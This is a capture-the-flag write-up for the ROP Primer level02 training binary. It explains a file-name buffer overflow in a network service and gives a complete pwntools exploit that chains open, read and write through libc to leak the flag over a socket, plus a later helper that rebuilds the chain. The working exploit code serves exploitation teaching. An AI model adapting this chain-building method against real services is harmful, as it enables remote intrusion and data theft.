ROP-2

ROP-PRIMER level02

This level has to be exploited remotely. I ran the binary under strace to see what it does and saw it calling htons(8888, ...), so the service listens on port 8888 and nc localhost 8888 connects to it. The service offers two commands, read and store. The store command is where the bug is: it reads the file name using the file size as the length, so a large file size lets us overflow the file-name buffer. The exploit therefore sends a size of 500, a short dummy file body, and then the ROP chain as the file name. The EIP offset turned out to be 64.

From there it is a matter of finding gadgets and building the chain. I searched the binary for a "flag" string and luckily there was one, so the chain calls open() on that string, read()s the file contents into the bss section, and finally write()s them back out to the socket.

NOTE: to find the file descriptors, use ltrace -f ./level01 (-f follows the forked child). That gave 3 for the file descriptor and 4 for the socket descriptor, which is why the chain read()s from 3 and write()s to 4.



from pwn import *

# Addresses for the target as found above (no ASLR on the target)
flag       = 0x0804a128   # "flag" string inside the binary
open_flag  = 0xf7ed3230   # open() in libc
read_flag  = 0xf7ed3710   # read() in libc
write_flag = 0xf7ed3790   # write() in libc
pop2ret    = 0x08048ef7   # pop ; pop ; ret        (discards 2 arguments)
pop3ret    = 0x08048ef6   # pop ; pop ; pop ; ret  (discards 3 arguments)
bss        = 0x0804a000   # writable scratch area the flag is read into

context(arch='i386')      # pack() now emits 4-byte little-endian words

payload  = b"A" * 64                                              # padding up to the saved EIP
payload += pack(open_flag)  + pack(pop2ret) + pack(flag) + pack(0)              # open("flag", O_RDONLY)
payload += pack(read_flag)  + pack(pop3ret) + pack(3) + pack(bss) + pack(32)    # read(3, bss, 32)
payload += pack(write_flag) + pack(0xdeadbeef) + pack(4) + pack(bss) + pack(32) # write(4, bss, 32); return address is junk
# The count argument of write() was missing in my first version of the chain,
# so write() used whatever happened to be next on the stack; pass it explicitly.

# The service is assumed to be already running on port 8888.
r = remote('127.0.0.1', 8888)
print(r.recvuntil(b'>'))
r.sendline(b'store')
print(r.recvuntil(b'>'))
r.sendline(b'500')            # file size, also (wrongly) used as the file-name length
print(r.recvuntil(b'>'))
r.sendline(b'Hello world')    # file contents
print(r.recvuntil(b'>'))
r.sendline(payload)           # file name: overflows the buffer and runs the chain
print(r.recvall(timeout=2))   # or r.recvuntil(b'}') to stop at the end of the flag
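The chain above is hand-packed word by word. As an added example (my code, not part of the original writeup or of ROP Primer), here is the same open/read/write chain built by a small helper that picks the pop-N;ret gadget for each call from the number of arguments and refuses to build a chain it cannot clean up. It uses struct instead of pwntools so it runs without a target; the addresses and the descriptors 3 and 4 are the ones reported above, and the bad-byte check assumes the server reads the file name line by line (so a 0x0a byte in any address would truncate the chain), which the writeup does not state. Null bytes are not treated as bad because the chain above contains several and worked.

```python
import struct

# Addresses as observed on the target in the writeup; the libc addresses only
# hold for that process image (no ASLR), they are not general constants.
FLAG_STR   = 0x0804a128   # "flag" string found inside the binary
BSS        = 0x0804a000   # writable scratch area the flag is read into
OPEN_ADDR  = 0xf7ed3230   # open() in libc
READ_ADDR  = 0xf7ed3710   # read() in libc
WRITE_ADDR = 0xf7ed3790   # write() in libc
POP_GADGETS = {2: 0x08048ef7, 3: 0x08048ef6}   # number of pops -> "pop..;ret"
EIP_OFFSET = 64
FLAG_FD, SOCK_FD = 3, 4   # descriptors found with ltrace -f (see the NOTE above)


def p32(value):
    """Little-endian 32-bit word, the same as pwntools' pack() on i386."""
    return struct.pack("<I", value & 0xffffffff)


def build_chain(calls, pop_gadgets, final_ret=0xdeadbeef):
    """Chain i386 cdecl calls as [func][ret][arg0..argN-1] frames.

    A cdecl callee leaves its arguments on the stack, so the return slot of
    every call except the last must be a "pop xN ; ret" gadget with exactly
    len(args) pops; it discards the arguments and returns into the next
    function address.  The last call returns into final_ret, which may be junk.
    """
    chain = b""
    for i, (func, args) in enumerate(calls):
        if i == len(calls) - 1:
            ret = final_ret
        elif len(args) in pop_gadgets:
            ret = pop_gadgets[len(args)]
        else:
            raise ValueError("need a pop%d;ret gadget to discard %d arguments"
                             % (len(args), len(args)))
        chain += p32(func) + p32(ret) + b"".join(p32(a) for a in args)
    return chain


def build_payload():
    """The writeup's open/read/write chain behind the 64-byte EIP offset."""
    calls = [
        (OPEN_ADDR,  [FLAG_STR, 0]),          # open("flag", O_RDONLY)
        (READ_ADDR,  [FLAG_FD, BSS, 32]),     # read(3, bss, 32)
        (WRITE_ADDR, [SOCK_FD, BSS, 32]),     # write(4, bss, 32)
    ]
    return b"A" * EIP_OFFSET + build_chain(calls, POP_GADGETS)


def bad_byte_positions(payload, bad=b"\n"):
    """Offsets of bytes the server's reader would stop at.

    Assumption: the name is read line by line, so 0x0a is the bad byte.  Nulls
    are allowed because the writeup's chain contains them and still ran.
    """
    return [i for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    pl = build_payload()
    print("payload: %d bytes, bad bytes at %r" % (len(pl), bad_byte_positions(pl)))
```

If a gadget with the right number of pops is missing, the helper raises instead of silently producing a chain that returns into an argument; with a real target you would then look for a larger pop gadget and pad the frame with extra junk words to match it.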